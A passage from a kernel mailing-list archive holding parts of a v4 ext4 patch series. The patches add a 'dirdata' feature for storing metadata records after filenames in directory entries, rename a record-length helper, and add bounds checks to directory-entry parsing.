+ unsigned int data_offset = de->name_len + 1;
+ unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len,
+ dir->i_sb->s_blocksize);
+
+ /* data_offset is relative to de->name, which itself starts
+ * EXT4_BASE_DIR_LEN bytes into the entry -- rec_len is relative to
+ * the start of the entry, so add the header size before comparing,
+ * or this lets reads run EXT4_BASE_DIR_LEN bytes past the entry. */
+ if (EXT4_BASE_DIR_LEN + data_offset > rec_len)
+ return ret;
+
+ /* compatibility: hash stored inline after filename (no dirdata) */
+ if (hinfo && !ext4_has_feature_dirdata(dir->i_sb) &&
+ ext4_hash_in_dirent(dir)) {
+ hinfo->hash = EXT4_DIRENT_HASH(de);
+ hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
+ ret |= EXT4_DIRENT_CFHASH;
+
+ return ret;
+ }
+
+ /* EXT4_DIRENT_* are not expected without flag in i_sb */
+ if (de->file_type & EXT4_DIRENT_LUFID) {
+ struct ext4_dirent_fid *disk_fid =
+ (struct ext4_dirent_fid *)(de->name + data_offset);
+ unsigned int dlen;
+
+ if (EXT4_BASE_DIR_LEN + data_offset + sizeof(disk_fid->df_header) > rec_len)
+ return ret;
+
+ dlen = disk_fid->df_header.ddh_length;
+ if (dlen < sizeof(*disk_fid) ||
+ EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len)
+ return ret;
+
+ if (dfid) {
+ /* copy the whole record (header + fid), not just the fid
+ * payload -- dlen already includes the header's length */
+ memcpy(dfid, disk_fid, dlen);
+ ret |= EXT4_DIRENT_LUFID;
+ }
+ data_offset += dlen;
+ }
+
+ /* Skip INO64 for now*/
+ if (de->file_type & EXT4_DIRENT_INO64) {
+ struct ext4_dirent_data_header *ddh =
+ (struct ext4_dirent_data_header *)(de->name + data_offset);
+ unsigned int dlen;
+
+ if (EXT4_BASE_DIR_LEN + data_offset + sizeof(*ddh) > rec_len)
+ return ret;
+
+ dlen = ddh->ddh_length;
+ if (dlen < sizeof(*ddh) ||
+ EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len)
+ return ret;
+
+ data_offset += dlen;
+ }
+
+ if (!hinfo)
+ return ret;
+
+ if (de->file_type & EXT4_DIRENT_CFHASH) {
+ struct ext4_dirent_hash *dh =
+ (struct ext4_dirent_hash *)(de->name + data_offset);
+ unsigned int dlen;
+
+ dlen = dh->dh_header.ddh_length;
+ if (dlen < sizeof(*dh) ||
+ EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len)
+ return ret;
+
+ hinfo->hash = le32_to_cpu(dh->dh_hash.hash);
+ hinfo->minor_hash = le32_to_cpu(dh->dh_hash.minor_hash);
+ ret |= EXT4_DIRENT_CFHASH;
+ }
+
+ return ret;
+}
+
+/*
+ * ext4_dirdata_set() - Write dirdata fields into a directory entry.
+ * @de: directory entry (name must already be set)
+ * @dir: directory inode
+ * @data: LUFID data to store (or NULL)
+ * @fname: filename info carrying the casefold hash
+ *
+ * Writes any required dirdata into @de after the filename. If the dirdata
+ * feature is not enabled, falls back to writing the hash inline after the
+ * filename (for compatibility with the older casefold+fscrypt format).
*/
+static void ext4_dirdata_set(struct ext4_dir_entry_2 *de, struct inode *dir,
+ struct ext4_dirent_fid *dfid,
+ struct ext4_filename *fname)
+{
+ struct dx_hash_info *hinfo = &fname->hinfo;
+ unsigned int data_offset = de->name_len + 1;
+ unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len,
+ dir->i_sb->s_blocksize);
+
+ /* de->name[] is declared with a fixed EXT4_NAME_LEN size, but the
+ * real backing storage is this entry's rec_len-sized space in the
+ * directory block; a max-length name (name_len == EXT4_NAME_LEN)
+ * leaves no declared array slot for the NUL terminator below, which
+ * FORTIFY_SOURCE treats as an out-of-bounds array write regardless
+ * of how much real space the entry has. */
+ if (dfid && de->name_len >= EXT4_NAME_LEN) {
+ EXT4_ERROR_INODE(dir, "Can not insert FID: name_len too long");
+ return;
+ }
+
+ /* always clear the gap byte at de->name[de->name_len], even when no
+ * FID is being appended -- otherwise it's never initialized before
+ * dirdata is written right after it, leaking a byte of stale memory
+ * to disk. Skip it for a max-length name: there's no declared array
+ * slot for it, and no dirdata can be appended in that case anyway
+ * (rejected above for dfid; data_offset would already be >= rec_len
+ * for any other dirdata kind). */
+ if (de->name_len < EXT4_NAME_LEN)
+ de->name[de->name_len] = 0;
+
+ if (dfid) {
+ unsigned int dlen = dfid->df_header.ddh_length;
+
+ if (EXT4_BASE_DIR_LEN + data_offset + dlen > rec_len) {
+ EXT4_ERROR_INODE(dir, "Can not insert FID");
+ return;
+ }
+
+ memcpy(&de->name[de->name_len + 1], dfid,
+ dlen);
+ de->file_type |= EXT4_DIRENT_LUFID;
+ data_offset += dlen;
+ }
+
+ if (ext4_hash_in_dirent(dir)) {
+ if (ext4_has_feature_dirdata(dir->i_sb)) {
+ struct ext4_dirent_hash *dh =
+ (struct ext4_dirent_hash *)(de->name + data_offset);
+
+ if (EXT4_BASE_DIR_LEN + data_offset + sizeof(*dh) > rec_len) {
+ EXT4_ERROR_INODE(dir, "Can not insert dhash dirdata");
+ return;
+ }
+
+ dh->dh_header.ddh_length = sizeof(*dh);
+ dh->dh_hash.hash = cpu_to_le32(hinfo->hash);
+ dh->dh_hash.minor_hash = cpu_to_le32(hinfo->minor_hash);
+ de->file_type |= EXT4_DIRENT_CFHASH;
+ } else {
+ /* Compatibility: store hash inline after filename */
+ if (EXT4_BASE_DIR_LEN + data_offset +
+ sizeof(struct ext4_dir_entry_hash) > rec_len) {
+ EXT4_ERROR_INODE(dir, "Can not insert dhash");
+ return;
+ }
+
+ EXT4_DIRENT_HASHES(de)->hash = cpu_to_le32(hinfo->hash);
+ EXT4_DIRENT_HASHES(de)->minor_hash =
+ cpu_to_le32(hinfo->minor_hash);
+ }
+ }
+}
+
+
static int dx_make_map(struct inode *dir, struct buffer_head *bh,
struct dx_hash_info *hinfo,
struct dx_map_entry *map_tail)
@@ -1323,9 +1505,8 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
((char *)de) - base))
return -EFSCORRUPTED;
if (de->name_len && de->inode) {
- if (ext4_hash_in_dirent(dir))
- h.hash = EXT4_DIRENT_HASH(de);
- else {
+ if (!(ext4_dirdata_get(de, dir, NULL, &h) &
+ EXT4_DIRENT_CFHASH)) {
int err = ext4fs_dirhash(dir, de->name,
de->name_len, &h);
if (err < 0)
@@ -2113,13 +2294,7 @@ void ext4_insert_dentry_data(struct inode *dir, struct inode *inode,
ext4_set_de_type(inode->i_sb, de, inode->i_mode);
de->name_len = fname_len(fname);
memcpy(de->name, fname_name(fname), fname_len(fname));
- if (ext4_hash_in_dirent(dir)) {
- struct dx_hash_info *hinfo = &fname->hinfo;
-
- EXT4_DIRENT_HASHES(de)->hash = cpu_to_le32(hinfo->hash);
- EXT4_DIRENT_HASHES(de)->minor_hash =
- cpu_to_le32(hinfo->minor_hash);
- }
+ ext4_dirdata_set(de, dir, data, fname);
}
/*
--
2.43.7
^ permalink raw reply related
* [PATCH v4 09/11] ext4: dirdata feature
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, Pravin Shelar, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
When fscrypt and casefold are enabled together for a directory,
all ext4_dir_entry[_2] in that directory store an 8-byte hash
of the filename after 'name' between 'name_len' and 'rec_len'.
However, there is no clear indication there is important data
stored in these bytes, which are only for padding and alignment
in other directory entries. This adds complexity to code handling
the on-disk directory entries, and there is no provision for other
metadata to be stored in each dir entry after 'name'.
The dirdata feature adds a mechanism to store multiple metadata
entries in each dir entry after 'name' (including the casefold+fscrypt hash).
The unused high 4 bits of 'file_type' are used to indicate whether
additional data fields are stored after 'name'. If a bit is set,
the corresponding dirdata record is present, starting after a NUL
filename terminator. If present, a record starts with a 1-byte
length (including the length byte itself) and the data immediately
follows the length byte without any alignment.
This allows up to four different dirdata records to be stored in
each entry, and allows unhandled record bytes to be skipped without
having to process the contents, providing forward compatibility.
If and when the fourth and last dirdata record is needed, it is
recommended to subdivide it further into sub-records: the first
byte holds the total record length, a second byte gives the length
of the first sub-record, and so on, as long as the total record
length is less than 255 bytes. This would not affect compatibility
with the current code, since the total record length still allows
the whole record to be skipped without processing its contents.
Signed-off-by: Pravin Shelar <pravin.shelar@sun.com>
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 27 +++++++++++++++++++++------
fs/ext4/inline.c | 23 +++++++++++++++++++----
fs/ext4/namei.c | 45 +++++++++++++++++++++++----------------------
fs/ext4/sysfs.c | 2 ++
4 files changed, 65 insertions(+), 32 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 2fc9fa6d3021..1e61ce13ed07 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -2334,6 +2334,7 @@ EXT4_FEATURE_INCOMPAT_FUNCS(casefold, CASEFOLD)
EXT4_FEATURE_INCOMPAT_FLEX_BG| \
EXT4_FEATURE_INCOMPAT_EA_INODE| \
EXT4_FEATURE_INCOMPAT_MMP | \
+ EXT4_FEATURE_INCOMPAT_DIRDATA | \
EXT4_FEATURE_INCOMPAT_INLINE_DATA | \
EXT4_FEATURE_INCOMPAT_ENCRYPT | \
EXT4_FEATURE_INCOMPAT_CASEFOLD | \
@@ -3035,10 +3036,18 @@ extern int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
struct ext4_filename *fname,
struct ext4_dir_entry_2 **dest_de,
int dlen);
-void ext4_insert_dentry(struct inode *dir, struct inode *inode,
- struct ext4_dir_entry_2 *de,
- int buf_size,
- struct ext4_filename *fname);
+void ext4_insert_dentry_data(struct inode *dir, struct inode *inode,
+ struct ext4_dir_entry_2 *de,
+ int buf_size,
+ struct ext4_filename *fname,
+ void *data);
+static inline void ext4_insert_dentry(struct inode *dir, struct inode *inode,
+ struct ext4_dir_entry_2 *de,
+ int buf_size,
+ struct ext4_filename *fname)
+{
+ ext4_insert_dentry_data(dir, inode, de, buf_size, fname, NULL);
+}
static inline void ext4_update_dx_flag(struct inode *inode)
{
if (!ext4_has_feature_dir_index(inode->i_sb) &&
@@ -3283,8 +3292,14 @@ extern int ext4_ext_migrate(struct inode *);
extern int ext4_ind_migrate(struct inode *inode);
/* namei.c */
-extern int ext4_init_new_dir(handle_t *handle, struct inode *dir,
- struct inode *inode);
+extern int ext4_init_new_dir_data(handle_t *handle, struct inode *dir,
+ struct inode *inode,
+ const void *data1, const void *data2);
+static inline int ext4_init_new_dir(handle_t *handle, struct inode *dir,
+ struct inode *inode)
+{
+ return ext4_init_new_dir_data(handle, dir, inode, NULL, NULL);
+}
extern int ext4_dirblock_csum_verify(struct inode *inode,
struct buffer_head *bh);
extern int ext4_htree_fill_tree(struct file *dir_file, __u32 start_hash,
diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
index 5b3faacdf143..1fff4defd45b 100644
--- a/fs/ext4/inline.c
+++ b/fs/ext4/inline.c
@@ -973,11 +973,16 @@ static int ext4_add_dirent_to_inline(handle_t *handle,
struct ext4_iloc *iloc,
void *inline_start, int inline_size)
{
- int err;
+ int err, dlen = 0;
struct ext4_dir_entry_2 *de;
+ unsigned char *data = NULL;
+
+ /* Deliver data in any appropriate way here. Now it is NULL */
+ if (data)
+ dlen = (*data) + 1;
err = ext4_find_dest_de(dir, iloc->bh, inline_start,
- inline_size, fname, &de, 0);
+ inline_size, fname, &de, dlen);
if (err)
return err;
@@ -986,7 +991,7 @@ static int ext4_add_dirent_to_inline(handle_t *handle,
EXT4_JTR_NONE);
if (err)
return err;
- ext4_insert_dentry(dir, inode, de, inline_size, fname);
+ ext4_insert_dentry_data(dir, inode, de, inline_size, fname, NULL);
ext4_show_inline_dir(dir, iloc->bh, inline_start, inline_size);
@@ -1326,7 +1331,17 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
pos = EXT4_INLINE_DOTDOT_SIZE;
} else {
de = (struct ext4_dir_entry_2 *)(dir_buf + pos);
- pos += ext4_rec_len_from_disk(de->rec_len, inline_size);
+ /* Use ext4_dir_entry_len to account for dirdata extensions.
+ * This buffer is the inline-data buffer (inline_size bytes),
+ * not a full directory block -- pass the real buffer size so
+ * a corrupted/sentinel on-disk rec_len doesn't get decoded as
+ * a full block's worth of bytes. */
+ pos += ext4_dir_entry_len(de, inline_size, dir);
+ /* Ensure pos stays inside the buffer to avoid an out-of-bounds read */
+ if (pos > inline_size) {
+ ret = count;
+ goto out;
+ }
if (ext4_check_dir_entry(inode, dir_file, de,
iloc.bh, dir_buf,
inline_size, pos)) {
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 73c8f1b399ef..91def9e0f84d 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -401,23 +401,26 @@ static struct dx_countlimit *get_dx_countlimit(struct inode *inode,
{
struct ext4_dir_entry_2 *de;
struct dx_root_info *root;
- int count_offset;
+ int count_offset, dotdot_rec_len;
int blocksize = EXT4_BLOCK_SIZE(inode->i_sb);
unsigned int rlen = ext4_rec_len_from_disk(dirent->rec_len, blocksize);
- if (rlen == blocksize)
+ if (rlen == blocksize) {
count_offset = sizeof(struct dx_node);
- else if (rlen == 12) {
- de = (struct ext4_dir_entry_2 *)(((void *)dirent) + 12);
- if (ext4_rec_len_from_disk(de->rec_len, blocksize) != blocksize - 12)
+ } else {
+ de = (struct ext4_dir_entry_2 *)(((char *)dirent) + rlen);
+ if (le16_to_cpu(de->rec_len) != (blocksize - rlen))
return NULL;
- root = (struct dx_root_info *)(((void *)de + 12));
+ /* de->rec_len covers whole dx_root block, calculate actual length.
+ * This is the '..' entry, which never carries the casefold+fscrypt
+ * hash, so pass NULL for dir regardless of the directory's flags */
+ dotdot_rec_len = ext4_dir_entry_len(de, blocksize, NULL);
+ root = (struct dx_root_info *)(((char *)de + dotdot_rec_len));
if (root->reserved_zero ||
root->info_length != sizeof(struct dx_root_info))
return NULL;
- count_offset = 32;
- } else
- return NULL;
+ count_offset = root->info_length + rlen + dotdot_rec_len;
+ }
if (offset)
*offset = count_offset;
@@ -716,7 +719,7 @@ static struct stats dx_show_leaf(struct inode *dir,
(unsigned) ((char *) de - base));
#endif
}
- space += ext4_dir_rec_len(de->name_len, dir);
+ space += ext4_dir_entry_len(de, size, dir);
names++;
}
de = ext4_next_entry(de, size);
@@ -2090,13 +2093,10 @@ int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
return 0;
}
-void ext4_insert_dentry(struct inode *dir,
- struct inode *inode,
- struct ext4_dir_entry_2 *de,
- int buf_size,
- struct ext4_filename *fname)
+void ext4_insert_dentry_data(struct inode *dir, struct inode *inode,
+ struct ext4_dir_entry_2 *de, int buf_size,
+ struct ext4_filename *fname, void *data)
{
-
int nlen, rlen;
nlen = ext4_dir_entry_len(de, buf_size, dir);
@@ -2138,15 +2138,15 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
unsigned int blocksize = dir->i_sb->s_blocksize;
int csum_size = 0;
int err, err2, dlen = 0;
- unsigned char *data = NULL;
+ struct ext4_dirent_fid *dfid = NULL;
/* Deliver data in any appropriate way here. Now it is NULL */
if (ext4_has_feature_metadata_csum(inode->i_sb))
csum_size = sizeof(struct ext4_dir_entry_tail);
if (!de) {
- if (data)
- dlen = (*data) + 1;
+ if (dfid)
+ dlen = dfid->df_header.ddh_length;
err = ext4_find_dest_de(dir, bh, bh->b_data,
blocksize - csum_size, fname, &de, dlen);
if (err)
@@ -2161,7 +2161,7 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
}
/* By now the buffer is marked for journaling */
- ext4_insert_dentry(dir, inode, de, blocksize, fname);
+ ext4_insert_dentry_data(dir, inode, de, blocksize, fname, dfid);
/*
* XXX shouldn't update any times until successful
@@ -3000,8 +3000,9 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
return ext4_handle_dirty_dirblock(handle, inode, bh);
}
-int ext4_init_new_dir(handle_t *handle, struct inode *dir,
- struct inode *inode)
+int ext4_init_new_dir_data(handle_t *handle, struct inode *dir,
+ struct inode *inode,
+ const void *data1, const void *data2)
{
struct buffer_head *dir_block = NULL;
ext4_lblk_t block = 0;
diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
index 923b375e017f..80074fb15ee9 100644
--- a/fs/ext4/sysfs.c
+++ b/fs/ext4/sysfs.c
@@ -362,6 +362,7 @@ EXT4_ATTR_FEATURE(verity);
#endif
EXT4_ATTR_FEATURE(metadata_csum_seed);
EXT4_ATTR_FEATURE(fast_commit);
+EXT4_ATTR_FEATURE(dirdata);
#if IS_ENABLED(CONFIG_UNICODE) && defined(CONFIG_FS_ENCRYPTION)
EXT4_ATTR_FEATURE(encrypted_casefold);
#endif
@@ -385,6 +386,7 @@ static struct attribute *ext4_feat_attrs[] = {
#endif
ATTR_LIST(metadata_csum_seed),
ATTR_LIST(fast_commit),
+ ATTR_LIST(dirdata),
#if IS_ENABLED(CONFIG_UNICODE) && defined(CONFIG_FS_ENCRYPTION)
ATTR_LIST(encrypted_casefold),
#endif
--
2.43.7
^ permalink raw reply related
* [PATCH v4 08/11] ext4: rename ext4_dir_rec_len() and clarify dirdata usage
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Rename ext4_dir_rec_len() to ext4_dirent_rec_len() to better
reflect that it computes the record length for a directory
entry based on the provided name length.
Update the comment to clarify handling of dirdata-enabled
directories and document the use of ext4_dir_entry_len()
when dirdata is present.
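Besides the rename, convert callers that walk existing entries to
ext4_dir_entry_len(), add a dlen argument to ext4_find_dest_de()
(currently always 0), and make dx_get_dx_info() bounds-check the
dx_root_info location, returning ERR_PTR(-EFSCORRUPTED) on failure.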
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/dir.c | 9 +++--
fs/ext4/ext4.h | 14 +++++---
fs/ext4/inline.c | 14 ++++----
fs/ext4/namei.c | 89 ++++++++++++++++++++++++++++++++----------------
4 files changed, 80 insertions(+), 46 deletions(-)
diff --git a/fs/ext4/dir.c b/fs/ext4/dir.c
index 17edd678fa87..d22b09f86365 100644
--- a/fs/ext4/dir.c
+++ b/fs/ext4/dir.c
@@ -89,16 +89,15 @@ int __ext4_check_dir_entry(const char *function, unsigned int line,
bool fake = is_fake_dir_entry(de);
bool has_csum = ext4_has_feature_metadata_csum(dir->i_sb);
- if (unlikely(rlen < ext4_dir_rec_len(1, fake ? NULL : dir)))
+ if (unlikely(rlen < ext4_dirent_rec_len(1, fake ? NULL : dir)))
error_msg = "rec_len is smaller than minimal";
else if (unlikely(rlen % 4 != 0))
error_msg = "rec_len % 4 != 0";
- else if (unlikely(rlen < ext4_dir_rec_len(de->name_len,
- fake ? NULL : dir)))
+ else if (unlikely(rlen < ext4_dir_entry_len(de, size, fake ? NULL : dir)))
error_msg = "rec_len is too small for name_len";
else if (unlikely(next_offset > size))
error_msg = "directory entry overrun";
- else if (unlikely(next_offset > size - ext4_dir_rec_len(1,
+ else if (unlikely(next_offset > size - ext4_dirent_rec_len(1,
has_csum ? NULL : dir) &&
next_offset != size))
error_msg = "directory entry too close to block end";
@@ -245,7 +244,7 @@ static int ext4_readdir(struct file *file, struct dir_context *ctx)
* failure will be detected in the
* dirent test below. */
if (ext4_rec_len_from_disk(de->rec_len,
- sb->s_blocksize) < ext4_dir_rec_len(1,
+ sb->s_blocksize) < ext4_dirent_rec_len(1,
inode))
break;
i += ext4_rec_len_from_disk(de->rec_len,
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index a369a0cd04bc..2fc9fa6d3021 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -2616,11 +2616,16 @@ struct ext4_dirent_hash {
* casefolded and encrypted need to store the hash as well, so we add room for
* ext4_extended_dir_entry_2. For all entries related to '.' or '..' you should
* pass NULL for dir, as those entries do not use the extra fields.
+ *
+ * For directories with the dirdata feature, extra data may follow the filename.
+ * Use ext4_dir_entry_len() to compute the length of a directory entry
+ * including any dirdata, or ext4_dirent_rec_len() directly when the total
+ * name_len (including dirdata length) is already known.
*/
-static inline unsigned int ext4_dir_rec_len(__u8 name_len,
+static inline unsigned int ext4_dirent_rec_len(unsigned int name_len,
const struct inode *dir)
{
- int rec_len = (name_len + 8 + EXT4_DIR_ROUND);
+ unsigned int rec_len = (name_len + 8 + EXT4_DIR_ROUND);
if (dir && ext4_hash_in_dirent(dir))
rec_len += sizeof(struct ext4_dir_entry_hash);
@@ -3028,7 +3033,8 @@ extern void ext4_htree_free_dir_info(struct dir_private_info *p);
extern int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
void *buf, int buf_size,
struct ext4_filename *fname,
- struct ext4_dir_entry_2 **dest_de);
+ struct ext4_dir_entry_2 **dest_de,
+ int dlen);
void ext4_insert_dentry(struct inode *dir, struct inode *inode,
struct ext4_dir_entry_2 *de,
int buf_size,
@@ -4148,7 +4154,7 @@ static inline unsigned int ext4_dir_entry_len(struct ext4_dir_entry_2 *de,
unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len, blocksize);
unsigned int dirdata = ext4_dirent_get_data_len(de, rec_len);
- return ext4_dir_rec_len(de->name_len + dirdata, dir);
+ return ext4_dirent_rec_len(de->name_len + dirdata, dir);
}
extern const struct iomap_ops ext4_iomap_ops;
diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
index 8045e4ff270c..5b3faacdf143 100644
--- a/fs/ext4/inline.c
+++ b/fs/ext4/inline.c
@@ -977,7 +977,7 @@ static int ext4_add_dirent_to_inline(handle_t *handle,
struct ext4_dir_entry_2 *de;
err = ext4_find_dest_de(dir, iloc->bh, inline_start,
- inline_size, fname, &de);
+ inline_size, fname, &de, 0);
if (err)
return err;
@@ -1055,7 +1055,7 @@ static int ext4_update_inline_dir(handle_t *handle, struct inode *dir,
int old_size = EXT4_I(dir)->i_inline_size - EXT4_MIN_INLINE_DATA_SIZE;
int new_size = get_max_inline_xattr_value_size(dir, iloc);
- if (new_size - old_size <= ext4_dir_rec_len(1, NULL))
+ if (new_size - old_size <= ext4_dirent_rec_len(1, NULL))
return -ENOSPC;
ret = ext4_update_inline_data(handle, dir,
@@ -1309,7 +1309,7 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
fake.name_len = 1;
memcpy(fake.name, ".", 2);
fake.rec_len = ext4_rec_len_to_disk(
- ext4_dir_rec_len(fake.name_len, NULL),
+ ext4_dirent_rec_len(fake.name_len, NULL),
inline_size);
ext4_set_de_type(inode->i_sb, &fake, S_IFDIR);
de = &fake;
@@ -1319,7 +1319,7 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
fake.name_len = 2;
memcpy(fake.name, "..", 3);
fake.rec_len = ext4_rec_len_to_disk(
- ext4_dir_rec_len(fake.name_len, NULL),
+ ext4_dirent_rec_len(fake.name_len, NULL),
inline_size);
ext4_set_de_type(inode->i_sb, &fake, S_IFDIR);
de = &fake;
@@ -1427,8 +1427,8 @@ int ext4_read_inline_dir(struct file *file,
* So we will use extra_offset and extra_size to indicate them
* during the inline dir iteration.
*/
- dotdot_offset = ext4_dir_rec_len(1, NULL);
- dotdot_size = dotdot_offset + ext4_dir_rec_len(2, NULL);
+ dotdot_offset = ext4_dirent_rec_len(1, NULL);
+ dotdot_size = dotdot_offset + ext4_dirent_rec_len(2, NULL);
extra_offset = dotdot_size - EXT4_INLINE_DOTDOT_SIZE;
extra_size = extra_offset + inline_size;
@@ -1463,7 +1463,7 @@ int ext4_read_inline_dir(struct file *file,
* failure will be detected in the
* dirent test below. */
if (ext4_rec_len_from_disk(de->rec_len, extra_size)
- < ext4_dir_rec_len(1, NULL))
+ < ext4_dirent_rec_len(1, NULL))
break;
i += ext4_rec_len_from_disk(de->rec_len,
extra_size);
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index e2dda8dee77c..73c8f1b399ef 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -527,13 +527,21 @@ ext4_next_entry(struct ext4_dir_entry_2 *p, unsigned long blocksize)
* Future: use high four bits of block for coalesce-on-delete flags
* Mask them off for now.
*/
-static struct dx_root_info *dx_get_dx_info(void *de_buf)
+static struct dx_root_info *dx_get_dx_info(struct inode *dir, void *de_buf)
{
- /* get dotdot first */
- de_buf = de_buf + ext4_dir_rec_len(1, NULL);
+ unsigned int blocksize = dir->i_sb->s_blocksize;
+ void *base = de_buf;
+
+ /* get dotdot first; '.' and '..' never carry the casefold+fscrypt
+ * hash, so pass NULL for dir regardless of the directory's flags */
+ de_buf += ext4_dir_entry_len(de_buf, blocksize, NULL);
/* dx root info is after dotdot entry */
- de_buf = de_buf + ext4_dir_rec_len(2, NULL);
+ de_buf += ext4_dir_entry_len(de_buf, blocksize, NULL);
+
+ if (de_buf < base || (char *)de_buf - (char *)base +
+ sizeof(struct dx_root_info) > blocksize)
+ return ERR_PTR(-EFSCORRUPTED);
return (struct dx_root_info *)de_buf;
}
@@ -584,7 +592,9 @@ static inline unsigned dx_root_limit(struct inode *dir,
struct dx_root_info *info;
unsigned int entry_space;
- info = dx_get_dx_info(dot_de);
+ info = dx_get_dx_info(dir, dot_de);
+ if (IS_ERR(info))
+ return 0;
entry_space = dir->i_sb->s_blocksize - ((char *)info - (char *)dot_de) -
info->info_length;
@@ -596,7 +606,7 @@ static inline unsigned dx_root_limit(struct inode *dir,
static inline unsigned dx_node_limit(struct inode *dir)
{
unsigned int entry_space = dir->i_sb->s_blocksize -
- ext4_dir_rec_len(0, dir);
+ ext4_dirent_rec_len(0, dir);
if (ext4_has_feature_metadata_csum(dir->i_sb))
entry_space -= sizeof(struct dx_tail);
@@ -800,7 +810,9 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
if (IS_ERR(frame->bh))
return (struct dx_frame *) frame->bh;
- info = dx_get_dx_info((struct ext4_dir_entry_2 *)frame->bh->b_data);
+ info = dx_get_dx_info(dir, (struct ext4_dir_entry_2 *)frame->bh->b_data);
+ if (IS_ERR(info))
+ goto fail;
if (info->hash_version != DX_HASH_TEA &&
info->hash_version != DX_HASH_HALF_MD4 &&
info->hash_version != DX_HASH_LEGACY &&
@@ -945,7 +957,7 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
return ret_err;
}
-static void dx_release(struct dx_frame *frames)
+static void dx_release(struct inode *dir, struct dx_frame *frames)
{
struct dx_root_info *info;
int i;
@@ -954,7 +966,9 @@ static void dx_release(struct dx_frame *frames)
if (frames[0].bh == NULL)
return;
- info = dx_get_dx_info((struct ext4_dir_entry_2 *)frames[0].bh->b_data);
+ info = dx_get_dx_info(dir, (struct ext4_dir_entry_2 *)frames[0].bh->b_data);
+ if (IS_ERR(info))
+ return;
/* save local copy, "info" may be freed after brelse() */
indirect_levels = info->indirect_levels;
for (i = 0; i <= indirect_levels; i++) {
@@ -1066,7 +1080,7 @@ static int htree_dirblock_to_tree(struct file *dir_file,
/* csum entries are not larger in the casefolded encrypted case */
top = (struct ext4_dir_entry_2 *) ((char *) de +
dir->i_sb->s_blocksize -
- ext4_dir_rec_len(0,
+ ext4_dirent_rec_len(0,
csum ? NULL : dir));
/* Check if the directory is encrypted */
if (IS_ENCRYPTED(dir)) {
@@ -1260,12 +1274,12 @@ int ext4_htree_fill_tree(struct file *dir_file, __u32 start_hash,
(count && ((hashval & 1) == 0)))
break;
}
- dx_release(frames);
+ dx_release(dir, frames);
dxtrace(printk(KERN_DEBUG "Fill tree: returned %d entries, "
"next hash: %x\n", count, *next_hash));
return count;
errout:
- dx_release(frames);
+ dx_release(dir, frames);
return (err);
}
@@ -1763,7 +1777,7 @@ static struct buffer_head * ext4_dx_find_entry(struct inode *dir,
errout:
dxtrace(printk(KERN_DEBUG "%s not found\n", fname->usr_fname->name));
success:
- dx_release(frames);
+ dx_release(dir, frames);
return bh;
}
@@ -1860,7 +1874,7 @@ dx_move_dirents(struct inode *dir, char *from, char *to,
while (count--) {
struct ext4_dir_entry_2 *de = (struct ext4_dir_entry_2 *)
(from + (map->offs<<2));
- rec_len = ext4_dir_rec_len(de->name_len, dir);
+ rec_len = ext4_dir_entry_len(de, blocksize, dir);
memcpy (to, de, rec_len);
((struct ext4_dir_entry_2 *) to)->rec_len =
@@ -1893,7 +1907,7 @@ static struct ext4_dir_entry_2 *dx_pack_dirents(struct inode *dir, char *base,
while ((char*)de < base + blocksize) {
next = ext4_next_entry(de, blocksize);
if (de->inode && de->name_len) {
- rec_len = ext4_dir_rec_len(de->name_len, dir);
+ rec_len = ext4_dir_entry_len(de, blocksize, dir);
if (de > to)
memmove(to, de, rec_len);
to->rec_len = ext4_rec_len_to_disk(rec_len, blocksize);
@@ -2045,10 +2059,11 @@ static struct ext4_dir_entry_2 *do_split(handle_t *handle, struct inode *dir,
int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
void *buf, int buf_size,
struct ext4_filename *fname,
- struct ext4_dir_entry_2 **dest_de)
+ struct ext4_dir_entry_2 **dest_de,
+ int dlen)
{
struct ext4_dir_entry_2 *de;
- unsigned short reclen = ext4_dir_rec_len(fname_len(fname), dir);
+ unsigned short reclen = ext4_dirent_rec_len(fname_len(fname) + dlen, dir);
int nlen, rlen;
unsigned int offset = 0;
char *top;
